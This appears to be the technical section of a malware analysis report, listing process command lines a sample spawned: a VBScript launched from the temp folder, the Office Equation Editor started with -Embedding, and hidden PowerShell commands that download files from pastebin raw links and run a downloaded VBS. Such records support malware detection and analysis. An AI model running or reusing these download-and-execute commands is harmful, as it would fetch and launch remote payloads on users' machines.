Техническая информация
- '%WINDIR%\syswow64\cscript.exe' %TEMP%\Putty.vbs AC
- '%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\Putty.vbs AC
- %TEMP%\putty.vbs
- '%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\Putty.vbs AC' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit curl https://pastebin.com/raw/0jhH2Pnq -o %TEMP%\Basys.txt; curl https://pastebin.com/raw/ZrgunZCZ -o %TEMP%\DecoBass.vbs; Start-Process '%TEMP%\DecoBass.vbs'' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit curl https://pastebin.com/raw/0jhH2Pnq -o %TEMP%\Basys.txt; curl https://pastebin.com/raw/ZrgunZCZ -o %TEMP%\DecoBass.vbs; Start-Process '%TEMP%\DecoBass.vbs'